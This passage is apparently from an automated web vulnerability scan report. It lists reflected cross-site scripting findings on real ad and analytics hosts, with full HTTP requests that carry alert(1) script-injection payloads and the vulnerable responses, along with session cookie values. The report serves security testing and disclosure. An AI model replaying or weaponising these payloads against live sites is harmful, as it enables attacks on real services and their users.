The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a99d"><script>alert(1)</script>bff1846b9fa was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html7a99d"><script>alert(1)</script>bff1846b9fa/1934160555@Right1 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMID=ae7a17da4ceb01b0;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:05:51 GMT
Server: Apache/1.3.41 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 370
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html7a99d"><script>alert(1)</script>bff1846b9fa/2118227437/Right1/default/empty.gif/61653761313764613463656230316230" target="_top">
...[SNIP]...

2.35. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1934160555@Right1 [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adstil.indiatimes.com
Path:	/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1934160555@Right1

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 580b7"><script>alert(1)</script>39a6a4fdfe5 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/580b7"><script>alert(1)</script>39a6a4fdfe5 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMID=ae7a17da4ceb01b0;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 00:05:52 GMT
Server: Apache/1.3.41 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 476
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/580b7"><script>alert(1)</script>39a6a4fdfe5/434379493/UNKNOWN/OasDefault/7811010WPeopleInteTOIROSGene_NRI/NRI31-toi-300x250.gif/61653761313764613463656230316230" target="_blank">
...[SNIP]...

2.36. http://b.collective-media.net/adj/bzo.361/L2_4985265 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.collective-media.net
Path:	/adj/bzo.361/L2_4985265

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86a1d'-alert(1)-'d8138406ca7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/bzo.36186a1d'-alert(1)-'d8138406ca7/L2_4985265 HTTP/1.1
Host: b.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 22 Nov 2010 23:35:56 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Wed, 22-Dec-2010 23:35:56 GMT
Content-Length: 421

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://b.collective-media.net/cmadj/bzo.36186a1d'-alert(1)-'d8138406ca7/L2_4985265;net=bzo;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.37. http://b.collective-media.net/adj/bzo.361/L2_4985265 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.collective-media.net
Path:	/adj/bzo.361/L2_4985265

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7572'-alert(1)-'2874c4f70a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/bzo.361/L2_4985265b7572'-alert(1)-'2874c4f70a HTTP/1.1
Host: b.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 22 Nov 2010 23:35:56 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Wed, 22-Dec-2010 23:35:56 GMT
Content-Length: 420

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://b.collective-media.net/cmadj/bzo.361/L2_4985265b7572'-alert(1)-'2874c4f70a;net=bzo;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.38. http://b.collective-media.net/adj/bzo.361/L2_4985265 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.collective-media.net
Path:	/adj/bzo.361/L2_4985265

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3ec5'-alert(1)-'bab15acfc74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/bzo.361/L2_4985265?e3ec5'-alert(1)-'bab15acfc74=1 HTTP/1.1
Host: b.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 22 Nov 2010 23:35:55 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Wed, 22-Dec-2010 23:35:55 GMT
Content-Length: 424

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://b.collective-media.net/cmadj/bzo.361/L2_4985265?e3ec5'-alert(1)-'bab15acfc74=1;net=bzo;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.39. http://b.collective-media.net/cmadj/bzo.361/L2_4985265 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.collective-media.net
Path:	/cmadj/bzo.361/L2_4985265

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b080e'-alert(1)-'9ee8a683715 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/bzo.361b080e'-alert(1)-'9ee8a683715/L2_4985265 HTTP/1.1
Host: b.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 22 Nov 2010 23:35:59 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7419

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-83846885_1290468959","http://ad.doubleclick.net//bzo.361b080e'-alert(1)-'9ee8a683715/L2_4985265;net=bzo;u=,bzo-83846885_1290468959,11bbcecf1d09b9d,none,bzo.automotive_l-bzo.finance_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h
...[SNIP]...

2.40. http://b.collective-media.net/cmadj/bzo.361/L2_4985265 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.collective-media.net
Path:	/cmadj/bzo.361/L2_4985265

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85eda'-alert(1)-'29795ae38d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/bzo.361/L2_498526585eda'-alert(1)-'29795ae38d7 HTTP/1.1
Host: b.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 22 Nov 2010 23:36:00 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7419

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-20038597_1290468960","http://ad.doubleclick.net//bzo.361/L2_498526585eda'-alert(1)-'29795ae38d7;net=bzo;u=,bzo-20038597_1290468960,11bbcecf1d09b9d,none,bzo.automotive_l-bzo.finance_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h;
...[SNIP]...

2.41. http://b.collective-media.net/cmadj/bzo.361/L2_4985265 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.collective-media.net
Path:	/cmadj/bzo.361/L2_4985265

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c074f'-alert(1)-'e505a8dfb80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/bzo.361/L2_4985265?c074f'-alert(1)-'e505a8dfb80=1 HTTP/1.1
Host: b.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 22 Nov 2010 23:35:58 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7422

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-71868915_1290468958","http://ad.doubleclick.net//bzo.361/L2_4985265?c074f'-alert(1)-'e505a8dfb80=1;net=bzo;u=,bzo-71868915_1290468958,11bbcecf1d09b9d,none,bzo.automotive_l-bzo.finance_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_
...[SNIP]...

2.42. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload fc7e1<script>alert(1)</script>b70bca55ed6 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8fc7e1<script>alert(1)</script>b70bca55ed6&c2=6135404&c3=15&c4=12590&c5=&c6=&c10=3175577&c15= HTTP/1.1
Accept: */*
Referer: http://www.smh.com.au/sport
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Cookie: UID=1cd27b1a-204.0.5.41-1289161421

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 29 Nov 2010 23:10:15 GMT
Date: Mon, 22 Nov 2010 23:10:15 GMT
Connection: close
Content-Length: 1460

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(m){try{if(!m){return}var j=1.9,n=m.options||{},l=n.doc||document,b=n.nav||navi
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8fc7e1<script>alert(1)</script>b70bca55ed6", c2:"6135404", c3:"15", c4:"12590", c5:"", c6:"", c10:"3175577", c15:"", c16:"", r:""});

2.43. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 895bf<script>alert(1)</script>8e865a2313c was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12590&c5=&c6=&c10=3175577895bf<script>alert(1)</script>8e865a2313c&c15= HTTP/1.1
Accept: */*
Referer: http://www.smh.com.au/sport
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Cookie: UID=1cd27b1a-204.0.5.41-1289161421

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 29 Nov 2010 23:10:16 GMT
Date: Mon, 22 Nov 2010 23:10:16 GMT
Connection: close
Content-Length: 1460

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(m){try{if(!m){return}var j=1.9,n=m.options||{},l=n.doc||document,b=n.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12590", c5:"", c6:"", c10:"3175577895bf<script>alert(1)</script>8e865a2313c", c15:"", c16:"", r:""});

2.44. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload fab9e<script>alert(1)</script>c8e7270084a was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12590&c5=&c6=&c10=3175577&c15=fab9e<script>alert(1)</script>c8e7270084a HTTP/1.1
Accept: */*
Referer: http://www.smh.com.au/sport
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Cookie: UID=1cd27b1a-204.0.5.41-1289161421

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 29 Nov 2010 23:10:18 GMT
Date: Mon, 22 Nov 2010 23:10:18 GMT
Connection: close
Content-Length: 1460

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(m){try{if(!m){return}var j=1.9,n=m.options||{},l=n.doc||document,b=n.nav||navi
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12590", c5:"", c6:"", c10:"3175577", c15:"fab9e<script>alert(1)</script>c8e7270084a", c16:"", r:""});

2.45. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload c3edc<script>alert(1)</script>3937a086f35 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404c3edc<script>alert(1)</script>3937a086f35&c3=15&c4=12590&c5=&c6=&c10=3175577&c15= HTTP/1.1
Accept: */*
Referer: http://www.smh.com.au/sport
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Cookie: UID=1cd27b1a-204.0.5.41-1289161421

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 29 Nov 2010 23:10:15 GMT
Date: Mon, 22 Nov 2010 23:10:15 GMT
Connection: close
Content-Length: 1460

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(m){try{if(!m){return}var j=1.9,n=m.options||{},l=n.doc||document,b=n.nav||navi
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404c3edc<script>alert(1)</script>3937a086f35", c3:"15", c4:"12590", c5:"", c6:"", c10:"3175577", c15:"", c16:"", r:""});

2.46. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 61924<script>alert(1)</script>0c19552a15 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=1561924<script>alert(1)</script>0c19552a15&c4=12590&c5=&c6=&c10=3175577&c15= HTTP/1.1
Accept: */*
Referer: http://www.smh.com.au/sport
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Cookie: UID=1cd27b1a-204.0.5.41-1289161421

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 29 Nov 2010 23:10:15 GMT
Date: Mon, 22 Nov 2010 23:10:15 GMT
Connection: close
Content-Length: 1459

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(m){try{if(!m){return}var j=1.9,n=m.options||{},l=n.doc||document,b=n.nav||navi
...[SNIP]...
){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"1561924<script>alert(1)</script>0c19552a15", c4:"12590", c5:"", c6:"", c10:"3175577", c15:"", c16:"", r:""});

2.47. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 8595e<script>alert(1)</script>135202e0e8c was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=125908595e<script>alert(1)</script>135202e0e8c&c5=&c6=&c10=3175577&c15= HTTP/1.1
Accept: */*
Referer: http://www.smh.com.au/sport
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Cookie: UID=1cd27b1a-204.0.5.41-1289161421

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 29 Nov 2010 23:10:16 GMT
Date: Mon, 22 Nov 2010 23:10:16 GMT
Connection: close
Content-Length: 1460

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(m){try{if(!m){return}var j=1.9,n=m.options||{},l=n.doc||document,b=n.nav||navi
...[SNIP]...
[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"125908595e<script>alert(1)</script>135202e0e8c", c5:"", c6:"", c10:"3175577", c15:"", c16:"", r:""});

2.48. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 379f3<script>alert(1)</script>5fd946a01df was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12590&c5=379f3<script>alert(1)</script>5fd946a01df&c6=&c10=3175577&c15= HTTP/1.1
Accept: */*
Referer: http://www.smh.com.au/sport
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Cookie: UID=1cd27b1a-204.0.5.41-1289161421

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 29 Nov 2010 23:10:16 GMT
Date: Mon, 22 Nov 2010 23:10:16 GMT
Connection: close
Content-Length: 1460

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(m){try{if(!m){return}var j=1.9,n=m.options||{},l=n.doc||document,b=n.nav||navi
...[SNIP]...
a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12590", c5:"379f3<script>alert(1)</script>5fd946a01df", c6:"", c10:"3175577", c15:"", c16:"", r:""});

2.49. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 43f94<script>alert(1)</script>9ee5057772f was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12590&c5=&c6=43f94<script>alert(1)</script>9ee5057772f&c10=3175577&c15= HTTP/1.1
Accept: */*
Referer: http://www.smh.com.au/sport
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: b.scorecardresearch.com
Proxy-Connection: Keep-Alive
Cookie: UID=1cd27b1a-204.0.5.41-1289161421

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 29 Nov 2010 23:10:16 GMT
Date: Mon, 22 Nov 2010 23:10:16 GMT
Connection: close
Content-Length: 1460

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(m){try{if(!m){return}var j=1.9,n=m.options||{},l=n.doc||document,b=n.nav||navi
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12590", c5:"", c6:"43f94<script>alert(1)</script>9ee5057772f", c10:"3175577", c15:"", c16:"", r:""});

